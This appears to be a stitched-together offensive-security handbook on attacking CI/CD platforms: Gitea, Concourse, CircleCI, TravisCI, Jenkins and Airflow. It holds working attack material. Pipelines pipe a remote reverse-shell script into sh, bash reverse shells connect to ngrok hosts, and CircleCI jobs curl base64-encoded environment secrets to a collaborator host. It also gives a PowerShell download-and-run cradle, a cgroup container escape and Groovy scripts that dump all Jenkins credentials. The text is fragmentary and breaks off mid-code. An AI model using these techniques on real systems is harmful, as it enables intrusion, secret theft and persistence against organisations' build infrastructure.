If the user has configured its username as his gitea username, you can access the public keys he has set in his account at https://<gitea_host>/<username>.keys; you could check this to confirm that the private key you found can be used.
SSH keys can also be set in repositories as deploy keys. Anyone with access to this key will be able to launch projects from a repository. Usually in a server with different deploy keys, the local file ~/.ssh/config will give you information about which key is related to which repo.
GPG Keys
As explained here, it's sometimes needed to sign the commits, or you might get discovered.
As explained in the basic information, the application will have full access
over the user account.
Enable Push: If anyone with write access can push to the branch, just
push to it.
Whitelist Restricted Push: The same way, if you are part of this list
push to the branch.
Enable Merge Whitelist: If there is a merge whitelist, you need to be
inside of it
Require approvals is bigger than 0: Then... you need to compromise
another user
Restrict approvals to whitelisted: If only whitelisted users can
approve... you need to compromise another user that is inside that list
Dismiss stale approvals: If approvals are not removed with new
commits, you could hijack an already approved PR to inject your code
and merge the PR.
Note that if you are an org/repo admin you can bypass the protections.
Enumerate Webhooks
Webhooks are able to send specific gitea information to some places. You might be able to exploit that communication.\ However, usually a secret you cannot retrieve is set in the webhook, which will prevent external users that know the URL of the webhook but not the secret from exploiting it.\ But on some occasions, people, instead of setting the secret in its place, set it in the URL as a parameter, so checking the URLs could allow you to find secrets and other places you could exploit further.
In the gitea path (by default: /data/gitea) you can also find interesting information like:
The sqlite DB: If gitea is not using an external db it will use a sqlite db
The sessions inside the sessions folder: Running cat
sessions/*/*/* you can see the usernames of the logged users (gitea
could also save the sessions inside the DB).
The jwt private key inside the jwt folder
More sensitive information could be found in this folder
If you are inside the server you can also use the gitea binary to access/modify information:
gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET will generate a token of the indicated type (persistence)
gitea admin user change-password --username admin --password <new_password> will change a user's password
A user may also be part of different teams with different permissions over
different repos.
Public
Limited (logged in users only)
Private (members only)
Org admins can also indicate if the repo admins can add and/or remove access for teams. They can also indicate the max number of repos.
When creating a team, it's indicated which repos of the org the members of the team will be able to access: specific repos (repos where the team is added) or all. It's also indicated if members can create new repos (the creator will get admin access to it).
The permissions the members of the team will have:
Administrator access
Specific access:
Teams & Users
In a repo, the org admin and the repo admins (if allowed by the org) can
manage the roles given to collaborators (other users) and teams. There are
3 possible roles:
Administrator
Write
Read
Gitea Authentication
Web Access
Using username + password and potentially (and recommended) a 2FA.
SSH Keys
You can configure your account with one or several public keys allowing
the related private key to perform actions on your behalf.
http://localhost:3000/user/settings/keys
GPG Keys
You cannot impersonate the user with these keys, but if you don't use them it might be possible that you get discovered for sending commits without a signature.
Oauth Applications
Just like personal access tokens, Oauth applications will have complete access over your account and the places your account has access to because, as indicated in the docs, scopes aren't supported yet:
Deploy keys
Deploy keys might have read-only or write access to the repo, so they might
be interesting to compromise specific repos.
Branch Protections
Branch protections are designed to not give complete control of a repository to the users. The goal is to put several protection methods in place before being able to write code into some branch.
As you can see, even if you managed to obtain some credentials of a user, repos might be protected, preventing you from pushing code to master, for example, to compromise the CI/CD pipeline.
concourse-architecture.md
Concourse Lab
Learn how you can run a concourse environment locally to do your own
tests in:
concourse-lab-creation.md
Enumerate & Attack Concourse
Learn how you can enumerate the concourse environment and abuse it in:
concourse-enumeration-and-attacks.md
The TSA by default listens on port 2222 , and is usually colocated with
the ATC and sitting behind a load balancer.
The TSA implements CLI over the SSH connection, supporting these
commands.
Workers
In order to execute tasks concourse must have some workers. These workers register themselves via the TSA and run the services Garden and Baggageclaim.
Garden: This is the Container Management API, usually run on port 7777 via HTTP.
Baggageclaim: This is the Volume Management API, usually run on port 7788 via HTTP.
With Docker-Compose
This docker-compose file simplifies the installation to do some tests with
concourse:
wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
docker-compose up -d
You can download the fly command line tool for your OS from the web interface at 127.0.0.1:8080
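Then you can log in with fly (the target name is arbitrary; test:test are the default credentials of this tutorial deployment, adjust them if yours differ):

fly -t tutorial login -c http://127.0.0.1:8080 -u test -p test
fly -t tutorial status # verify the token works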
After generating the concourse env, you could generate a secret and give the SA running in concourse web access to read K8s secrets:
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: read-secrets
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-secrets-concourse
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: read-secrets
subjects:
- kind: ServiceAccount
  name: concourse-release-web
  namespace: default
---
apiVersion: v1
kind: Secret
metadata:
  name: super
  namespace: concourse-release-main
type: Opaque
data:
  secret: MWYyZDFlMmU2N2Rm
' | kubectl apply -f -
Create Pipeline
A pipeline is made of a list of Jobs which contains an ordered list of Steps.
Steps
Several different types of steps can be used:
Each step in a job plan runs in its own container. You can run anything you
want inside the container (i.e. run my tests, run this bash script, build this
image, etc.). So if you have a job with five steps Concourse will create five
containers, one for each step.
Therefore, it's possible to indicate the type of container each step needs to
be run in.
jobs:
- name: simple
  plan:
  - task: simple-task
    privileged: true
    config:
      # Tells Concourse which type of worker this task should run on
      platform: linux
      image_resource:
        type: registry-image
        source:
          repository: busybox # images are pulled from docker hub by default
      run:
        path: sh
        args:
        - -cx
        - |
          sleep 1000
          echo "$SUPER_SECRET"
      params:
        SUPER_SECRET: ((super.secret))
fly -t tutorial set-pipeline -p pipe-name -c hello-world.yml
# pipelines are paused when first created
fly -t tutorial unpause-pipeline -p pipe-name
# trigger the job and watch it run to completion
fly -t tutorial trigger-job --job pipe-name/simple --watch
# From another console
fly -t tutorial intercept --job pipe-name/simple
Triggers
You don't need to trigger the jobs manually every time you need to run them; you can also program them to be run every time:
Static Vars
Static vars can be specified in tasks steps:
- task: unit-1.13
file: booklit/ci/unit.yml
vars: {tag: 1.13}
Credential Management
There are different ways a Credential Manager can be specified in a
pipeline, read how in https://concourse-ci.org/creds.html. Moreover,
Concourse supports different credential managers:
Note that if you have some kind of write access to Concourse you can
create jobs to exfiltrate those secrets as Concourse needs to be able to
access them.
Concourse Enumeration
In order to enumerate a concourse environment you first need to gather valid credentials or to find an authenticated token, probably in a .flyrc config file.

fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]

Note that the API token is saved in $HOME/.flyrc by default; when looting a machine you could find the credentials there.
Pipelines
List pipelines:
fly -t <target> pipelines -a
Get all the pipelines secret names used (if you can create/modify a
job or hijack a container you could exfiltrate them):
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
  echo $pipename;
  fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
  echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
List containers:
fly -t <target> containers
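Some other enumeration subcommands that may be useful (standard fly subcommands, verify against your fly version):

fly -t <target> teams    # list the teams you have access to
fly -t <target> workers  # list registered workers (the nodes running the jobs)
fly -t <target> volumes  # list volumes
fly -t <target> builds   # list recent builds
fly targets              # list locally configured targets and their tokens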
Pipeline Creation/Modification
If you have enough privileges (member role or more) you will be able to
create/modify new pipelines. Check this example:
jobs:
- name: simple
  plan:
  - task: simple-task
    privileged: true
    config:
      # Tells Concourse which type of worker this task should run on
      platform: linux
      image_resource:
        type: registry-image
        source:
          repository: busybox # images are pulled from docker hub by default
      run:
        path: sh
        args:
        - -cx
        - |
          echo "$SUPER_SECRET"
          sleep 1000
      params:
        SUPER_SECRET: ((super.secret))
With the modification/creation of a new pipeline you will be able to:
Steal the secrets (via echoing them out or getting inside the container
and running env )
Escape to the node (by giving you enough privileges - privileged:
true )
Enumerate/Abuse cloud metadata endpoint (from the pod and from
the node)
Delete created pipeline
In the following PoC we are going to use the release_agent to escape with
some small modifications:
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the memory cgroup controller, try changing memory to rdma to fix it
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# CHANGE ME
# The host path will look like the following, but you need to change it:
host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"

#====================================
# Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
chmod a+x /cmd
#====================================
# Get output
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#====================================
As you might have noticed, this is just a regular release_agent escape, just modifying the path of the cmd in the node.
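The remaining steps of the standard release_agent technique (not shown in the snippet above) would be something like the following sketch, reusing the host_path set before:

# Tell the kernel to invoke the release_agent when the last process leaves the child cgroup
echo 1 > /tmp/cgrp/x/notify_on_release
# The release_agent must point to the path of /cmd as seen from the host
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Add a short-lived process to the child cgroup; when it exits, /cmd runs on the host
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
sleep 3
cat /output # only for the "get output" variant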
cat /concourse-auth/local-users
test:test
You could use those credentials to log in to the web server, create a privileged container and escape to the node.
In the environment you can also find information to access the postgresql instance that concourse uses (address, username, password and database, among other info):
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432
CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432
CONCOURSE_POSTGRES_USER=concourse
CONCOURSE_POSTGRES_DATABASE=concourse
CONCOURSE_POSTGRES_PASSWORD=concourse
[...]
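A sketch of how those values could be used to connect directly to the backing database (assuming a psql client is available from your position):

PGPASSWORD="$CONCOURSE_POSTGRES_PASSWORD" psql \
  -h "$CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR" \
  -p "$CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT" \
  -U "$CONCOURSE_POSTGRES_USER" \
  -d "$CONCOURSE_POSTGRES_DATABASE" \
  -c '\dt' # list tables (teams, pipelines, build data...)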
Note that, playing with concourse, I noticed that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring over HTTP, you could tamper with the communication to avoid the deletion of unexpected containers:

GET /containers HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
However, you need to be a repo admin in order to convert the repo into a CircleCI project.
Env Variables & Secrets
According to the docs there are different ways to load values in
environment variables inside a workflow.
Clear text
You can declare them in clear text inside a command:
- run:
name: "set and echo"
command: |
SECRET="A secret"
echo $SECRET
You can declare them in clear text inside the run environment:
- run:
name: "set and echo"
command: echo $SECRET
environment:
SECRET: A secret
You can declare them in clear text inside the build-job environment:

jobs:
  build-job:
    docker:
      - image: cimg/base:2020.01
    environment:
      SECRET: A secret

You can declare them in clear text inside the environment of a container:

jobs:
  build-job:
    docker:
      - image: cimg/base:2020.01
        environment:
          SECRET: A secret
Project Secrets
These are secrets that are only going to be accessible by the project (by any branch).\ You can see them declared in https://app.circleci.com/settings/project/github/<org_name>/<repo_name>/environment-variables
The "Import Variables" functionality allows importing variables from other projects into this one.
Context Secrets
These are secrets that are org wide. By default any repo is going to be able
to access any secret stored here:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env
If you don't have access to the web console but you have access to the
repo and you know that CircleCI is used, you can just create a workflow
that is triggered every minute and that exfils the secrets to an external
address:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl
https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?
a=`env | base64 -w0`"
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env:
context: Test-Context
If you don't have access to the web console but you have access to the
repo and you know that CircleCI is used, you can just modify a workflow
that is triggered every minute and that exfils the secrets to an external
address:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl
https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?
a=`env | base64 -w0`"
jobs:
exfil-env:
#docker:
# - image: cimg/base:stable
machine:
image: ubuntu-2004:current
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- setup_remote_docker:
version: 19.03.13
Persistence
It's possible to create user tokens in CircleCI to access the API endpoints with the user's access.
https://app.circleci.com/settings/user/tokens
It's possible to create project tokens to access the project with the permissions given to the token.
https://app.circleci.com/settings/project/github/<org_name>/<repo_name>/api
It's possible to add SSH keys to the projects.
https://app.circleci.com/settings/project/github/<org_name>/<repo_name>/ssh
It's possible to create a cron job in a hidden branch of an unexpected project that leaks all the context env vars every day.
Or even create in a branch / modify a known job that will leak all context and project secrets every day.
If you are a github owner you can allow unverified orbs and configure one in a job as a backdoor.
You can find a command injection vulnerability in some task and inject commands via a secret, modifying its value.
basic-travisci-information.md
Attacks
Triggers
To launch an attack you first need to know how to trigger a build. By
default TravisCI will trigger a build on pushes and pull requests:
Cron Jobs
If you have access to the web application you can set crons to run the build; this could be useful for persistence or to trigger a build:
It looks like it's not possible to set crons inside the .travis.yml according to this.
Third Party PR
TravisCI by default disables sharing env variables with PRs coming from
third parties, but someone might enable it and then you could create PRs to
the repo and exfiltrate the secrets:
Dumping Secrets
As explained in the basic information page, there are 2 types of secrets: Environment Variables secrets (which are listed in the web page) and custom encrypted secrets, which are stored inside the .travis.yml file as base64 (note that both are stored encrypted and will end up as env variables in the final machines).
TODO:
Example build with reverse shell running on Windows/Mac/Linux
Example build leaking the env base64 encoded in the logs
TravisCI Enterprise
If an attacker ends up in an environment which uses TravisCI enterprise (more info about what this is in the basic information), he will be able to trigger builds in the Worker. This means that an attacker will be able to move laterally to that server, from which he could be able to:
user:email (read-only)
read:org (read-only)
repo : Grants read and write access to code, commit statuses,
collaborators, and deployment statuses for public and private
repositories and organizations.
Encrypted Secrets
Environment Variables
In TravisCI, as in other CI platforms, it's possible to save at repo level secrets that will be stored encrypted, then decrypted and pushed into the environment variables of the machine executing the build.
It's possible to indicate the branches to which the secrets are going to be available (by default all) and also whether TravisCI should hide their value if it appears in the logs (by default it will).
Then, you can use this setup to encrypt secrets and add them to your .travis.yml. The secrets will be decrypted when the build is run and will be accessible in the environment variables.
Note that the secrets encrypted this way won't appear listed in the environment variables of the settings.
Note that when encrypting a file, 2 env variables will be configured inside the repo, such as:
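As a hedged sketch using the official travis CLI (the <id> part of the variable names is generated per encrypted file):

# Encrypt an env var and add it to .travis.yml
travis encrypt MY_SECRET_ENV=super_secret --add env.global
# Encrypt a whole file; this also adds decryption env vars to the repo settings
travis encrypt-file id_rsa --add
# The created env vars look like: $encrypted_<id>_key and $encrypted_<id>_iv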
TravisCI Enterprise
Travis CI Enterprise is an on-prem version of Travis CI, which you can deploy in your own infrastructure. Think of it as the 'server' version of Travis CI. Using it allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment which you can configure and secure as you want.
1. TCI services (or TCI Core Services), responsible for integration with
version control systems, authorizing builds, scheduling build jobs, etc.
2. TCI Worker and build environment images (also called OS images).
basic-jenkins-information.md
Unauthenticated Enumeration
In order to search for interesting Jenkins pages that don't require authentication (like /people or /asynchPeople, which lists the current users) you can use:
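For example (just one option, the exact tool isn't shown in this dump), the Metasploit enumeration module:

msf> use auxiliary/scanner/http/jenkins_enum
msf> set RHOSTS <jenkins_host>
msf> set RPORT 8080
msf> run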
You may be able to get the Jenkins version from the path /oops or /error
Known Vulnerabilities
https://github.com/gquere/pwn_jenkins
Login
In the basic information you can check all the ways to login inside
Jenkins:
basic-jenkins-information.md
Register
You will be able to find Jenkins instances that allow you to create an
account and login inside of it. As simple as that.
SSO Login
Also, if SSO functionality/plugins are present, then you should attempt to log in to the application using a test account (i.e., a test Github/Bitbucket account). Trick from here.
Bruteforce
Jenkins does not implement any password policy or username brute-force mitigation. Therefore, you should always try to brute-force users because probably weak passwords are being used (even usernames as passwords or reversed usernames as passwords).
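A sketch with hydra against the classic form-login endpoint (/j_acegi_security_check); the path and the failure string may need adjusting to your instance:

hydra -L users.txt -P passwords.txt -s 8080 <jenkins_host> http-post-form \
  "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"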
IP Whitelisting Bypass
Many orgs combine SaaS-based source control management (SCM) systems (like GitHub or GitLab) with an internal, self-hosted CI solution (e.g. Jenkins, TeamCity), allowing these CI systems to receive webhook events from the SaaS source control vendors, for the simple purpose of triggering pipeline jobs.
Therefore, the orgs whitelist the IP ranges of the SCM, allowing them to reach the internal CI system with webhooks. However, note how anyone can create an account in Github or Gitlab and make it trigger a webhook that could send a request to that internal CI system.
scm-ip-whitelisting-bypass.md
Internal Jenkins Abuses
In these scenarios we are going to suppose you have a valid account to
access Jenkins.
basic-jenkins-information.md
Listing users
If you have accessed Jenkins you can list other registered users in
http://127.0.0.1:8080/asynchPeople/
jenkins-rce-creating-modifying-project.md
jenkins-rce-with-groovy-script.md
jenkins-rce-creating-modifying-pipeline.md
Pipeline Exploitation
To exploit pipelines you still need to have access to Jenkins.
Build Pipelines
Pipelines can also be used as build mechanism in projects, in that case it
can be configured a file inside the repository that will contains the pipeline
syntax. By default /Jenkinsfile is used:
It's also possible to store pipeline configuration files in other places (in
other repositories for example) with the goal of separating the repository
access and the pipeline access.
If an attacker have write access over that file he will be able to modify it
and potentially trigger the pipeline without even having access to Jenkins.\
It's possible that the attacker will need to bypass some branch protections
(depending on the platform and the user privileges they could be bypassed
or not).
If you are an external user you shouldn't expect to create a PR to the main
branch of the repo of other user/organization and trigger the pipeline...
but if it's bad configured you could fully compromise companies just by
exploiting this.
Pipeline RCE
In the previous RCE section a technique to get RCE by modifying a pipeline was already indicated.
pipeline {
    agent {label 'built-in'}
    environment {
        GENERIC_ENV_VAR = "Test pipeline ENV variables."
    }
    stages {
        stage("Build") {
            environment {
                STAGE_ENV_VAR = "Test stage ENV variables."
            }
            steps {
                // The body of this step was cut off in the dump; any sh step placed here
                // runs on the selected agent, e.g.:
                sh '''
                whoami
                env
                '''
            }
        }
    }
}
Dumping secrets
For information about how secrets are usually treated by Jenkins check out the basic information:
basic-jenkins-information.md
Here you have the way to load some common secret types:
withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
    sh '''
        env #Search for USERNAME and PASS
    '''
}

withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
    sh '''
        env # Search for USERPASS
    '''
}
At the end of this page you can find all the credential types:
https://www.jenkins.io/doc/pipeline/steps/credentials-binding/
The best way to dump all the secrets at once is by compromising the Jenkins machine (running a reverse shell in the built-in node for example), then leaking the master keys and the encrypted secrets and decrypting them offline. More on how to do this in the Nodes & Agents section and in the Post Exploitation section.
Triggers
From the docs: The triggers directive defines the automated ways in
which the Pipeline should be re-triggered. For Pipelines which are
integrated with a source such as GitHub or BitBucket, triggers may not
be necessary as webhooks-based integration will likely already be present.
The triggers currently available are cron , pollSCM and upstream .
Cron example (as used in the complete example below): triggers { cron('H */4 * * 1-5') }
You can enumerate the configured nodes in /computer/ . You will usually find the Built-In Node (which is the node running Jenkins) and potentially more:
To indicate you want to run the pipeline in the built-in Jenkins node you
can specify inside the pipeline the following config:
pipeline {
agent {label 'built-in'}
Complete example
Pipeline in a specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
pipeline {
    agent {label 'built-in'}
    triggers { cron('H */4 * * 1-5') }
    environment {
        GENERIC_ENV_VAR = "Test pipeline ENV variables."
    }

    stages {
        stage("Build") {
            environment {
                STAGE_ENV_VAR = "Test stage ENV variables."
            }

            steps {
                withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
                                 string(credentialsId: 'slack-url', variable: 'SLACK_URL')]) {
                    sh '''
                        curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
                    '''
                }
            }
        }
    }

    post {
        always {
            cleanWs()
        }
    }
}
Post Exploitation
Metasploit
msf> post/multi/gather/jenkins_gather
Jenkins Secrets
You can list the secrets by accessing /credentials/ if you have enough permissions. Note that this will only list the secrets inside the credentials.xml file, but build configuration files might also have more credentials.
If you can see the configuration of each project, you can also see in there the names of the credentials (secrets) being used to access the repository and other credentials of the project.
From Groovy
jenkins-dumping-secrets-from-groovy.md
From disk
These files are needed to decrypt Jenkins secrets:
secrets/master.key
secrets/hudson.util.Secret
credentials.xml
jobs/.../build.xml
jobs/.../config.xml
# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>

println(hudson.util.Secret.decrypt("{...}"))
config.xml
If you have filesystem access you can reset the authentication by editing config.xml: stop Jenkins, set <useSecurity>false</useSecurity>, and start Jenkins again.
4. Now go to the Jenkins portal again and Jenkins will not ask for any credentials this time. Navigate to "Manage Jenkins" to set the administrator password again.
5. Enable the security again by changing the setting back to <useSecurity>true</useSecurity> and restart Jenkins again.
References
https://github.com/gquere/pwn_jenkins
https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/
https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password
https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html
https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072
Cookie
If an authorized cookie gets stolen, it can be used to access the user's session. The cookie is usually called JSESSIONID.* . (A user can terminate all of his sessions, but he would first need to find out that a cookie was stolen.)
SSO/Plugins
Jenkins can be configured using plugins to be accessible via third party
SSO.
Tokens
Users can generate tokens to give applications access to impersonate them via CLI or REST API.
SSH Keys
This component provides a built-in SSH server for Jenkins. It’s an
alternative interface for the Jenkins CLI, and commands can be invoked this
way using any SSH client. (From the docs)
Authorization
In /configureSecurity it's possible to configure the authorization
method of Jenkins. There are several options:
Plugins can provide additional security realms which may be useful for
incorporating Jenkins into existing identity systems, such as:
Active Directory
GitHub Authentication
Atlassian Crowd 2
Jenkins Nodes, Agents & Executors
Nodes are the machines on which build agents run. Jenkins monitors each
attached node for disk space, free temp space, free swap, clock time/sync
and response time. A node is taken offline if any of these values go outside
the configured threshold.
Credentials Access
Credentials can be scoped to global providers ( /credentials/ ) that can
be accessed by any project configured, or can be scoped to specific
projects ( /job/<project-name>/configure ) and therefore only accessible
from the specific project.
According to the docs: Credentials that are in scope are made available to
the pipeline without limitation. To prevent accidental exposure in the
build log, credentials are masked from regular output, so an invocation of
env (Linux) or set (Windows), or programs printing their environment
or parameters would not reveal them in the build log to users who would
not otherwise have access to the credentials.
1. Go to path_jenkins/script
2. Inside the text box introduce the script
If you need to use quotes and single quotes inside the text, you can use """PAYLOAD""" (triple double quotes) to execute the payload.
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
Script
You can automate this process with this script.
2. Inside the Build section set Execute shell and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using unicorn). Start the payload with PowerShell.exe instead of using powershell.
3. Click Build now
   i. If the Build now button doesn't appear, you can still go to configure --> Build Triggers --> Build periodically and set a cron of * * * * *
   ii. Instead of using cron, you can use the config "Trigger builds remotely" where you just need to set the API token name to trigger the job. Then go to your user profile and generate an API token (name this API token as you called the API token to trigger the job). Finally, trigger the job with: curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>
Modifying a Project
Go to the projects and check if you can configure any of them (look for the
"Configure button"):
If you cannot see any configuration button then you probably cannot configure it (but check all projects as you might be able to configure some of them and not others).
Or try to access the path /job/<proj-name>/configure or /me/my-views/view/all/job/Project0/configure .
Execution
If you are allowed to configure the project you can make it execute
commands when a build is successful:
Click on Save and build the project and your command will be executed.
If you are not executing a reverse shell but a simple command you can see the output of the command inside the output of the build.
pipeline {
    agent any

    stages {
        stage('Hello') {
            steps {
                sh '''
                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
                '''
            }
        }
    }
}
Finally click on Save, and Build Now and the pipeline will be executed:
Modifying a Pipeline
If you can access the configuration file of some configured pipeline you could just modify it, appending your reverse shell, and then execute it or wait until it gets executed.
You can dump all the secrets from the Groovy Script console in /script by running this code:
// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
import com.cloudbees.plugins.credentials.*
import com.cloudbees.plugins.credentials.impl.*
import com.cloudbees.plugins.credentials.domains.*
import com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey
import org.jenkinsci.plugins.plaincredentials.StringCredentials
import org.jenkinsci.plugins.plaincredentials.impl.FileCredentialsImpl

// Helper to print one row per credential and the credentials domain (null = global scope)
def showRow = { credentialType, secretId, username = null, password = null, description = null ->
    println("${credentialType} : " + secretId + " | " + username + " | " + password + " | " + description)
}
domainName = null

credentialsStore = Jenkins.instance.getExtensionList('com.cloudbees.plugins.credentials.SystemCredentialsProvider')[0]?.getStore()
domain = new Domain(domainName, null, Collections.<DomainSpecification>emptyList())

credentialsStore?.getCredentials(domain).each{
    if(it instanceof UsernamePasswordCredentialsImpl)
        showRow("user/password", it.id, it.username, it.password?.getPlainText(), it.description)
    else if(it instanceof BasicSSHUserPrivateKey)
        showRow("ssh priv key", it.id, it.passphrase?.getPlainText(), it.privateKeySource?.getPrivateKey()?.getPlainText(), it.description)
    else if(it instanceof StringCredentials)
        showRow("secret text", it.id, it.secret?.getPlainText(), '', it.description)
    else if(it instanceof FileCredentialsImpl)
        showRow("secret file", it.id, it.content?.text, '', it.description)
    else
        showRow("something else", it.id, '', '', '')
}
return
or this one:
import java.nio.charset.StandardCharsets;

def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
    com.cloudbees.plugins.credentials.Credentials.class
)

for (c in creds) {
    println(c.id)
    if (c.properties.description) {
        println("   description: " + c.description)
    }
    if (c.properties.username) {
        println("   username: " + c.username)
    }
    if (c.properties.password) {
        println("   password: " + c.password)
    }
    if (c.properties.passphrase) {
        println("   passphrase: " + c.passphrase)
    }
    if (c.properties.secret) {
        println("   secret: " + c.secret)
    }
    if (c.properties.secretBytes) {
        println("   secretBytes: ")
        println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
        println("")
    }
    if (c.properties.privateKeySource) {
        println("   privateKey: " + c.getPrivateKey())
    }
    if (c.properties.apiToken) {
        println("   apiToken: " + c.apiToken)
    }
    if (c.properties.token) {
        println("   token: " + c.token)
    }
    println("")
}
Therefore, the orgs whitelist the IP ranges of the SCM, allowing them to reach the internal CI system with webhooks. However, note that anyone can create an account in Github or Gitlab and make it trigger a webhook that could send a request to that internal CI system.
Moreover, note that while the IP range of the SCM vendor webhook service
was opened in the organization’s firewall to allow webhook requests to
trigger pipelines – this does not mean that webhook requests cannot be
directed towards other CI endpoints, besides the ones that regularly listen
to webhook events. We can try and access these endpoints to view valuable
data like users, pipelines, console output of pipeline jobs, or if we’re
lucky enough to fall on an instance that grants admin privileges to
unauthenticated users (yes, it happens), we can access the configurations
and credentials sections.
Scenario
Imagine a Jenkins service which only allows GitHub and GitLab IPs to reach it externally.
POST /j_acegi_security_check?j_username=admin&j_password=mypass123&from=%2F&Submit=Sign+in HTTP/1.1
Host: jenkins.example-domain.com
[...]

http://jenkins.example-domain.com/j_acegi_security_check?j_username=admin&j_password=therealpassword&from=%2F&Submit=Sign+in
We fire the webhook and see the results. All SCM vendors display the HTTP request and response sent through the webhook in their UI. If the login attempt fails, we're redirected to the login error page.
But if the login is successful, we're redirected to the main Jenkins page, and a session cookie is set.
http://jenkins.example-domain.com/j_acegi_security_check?j_username=admin&j_password=secretpass123&from=/job/prod_pipeline/1/consoleText&Submit=Sign+in

http://jenkins.example-domain.com/job/prod_pipeline/1/consoleText
Job console output is sent back and presented in the attacker’s GitLab
webhook event log.
Minikube
One easy way to run Apache Airflow is to run it with minikube:
airflow-configuration.md
Airflow RBAC
Before starting to attack Airflow you should understand how permissions work:
airflow-rbac.md
Attacks
Web Console Enumeration
If you have access to the web console you might be able to access some or
all of the following information:
Privilege Escalation
If the expose_config configuration is set to True, users from the User role and upwards can read the config in the web UI. This config contains the secret_key, which means any user with this value can craft their own signed cookie to impersonate any other user account.
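A minimal sketch of abusing a leaked secret_key with the flask-unsign tool; the exact session payload shown is an assumption, so decode a real cookie first to see its structure:
pip3 install flask-unsign
flask-unsign --decode --cookie '<current_session_cookie>'
flask-unsign --sign --cookie "{'_user_id': '1', '_fresh': True}" --secret '<leaked_secret_key>'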
# Imports needed to define the DAG with a BashOperator
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator

with DAG(
    dag_id='rev_shell_bash',
    schedule_interval='0 0 * * *',
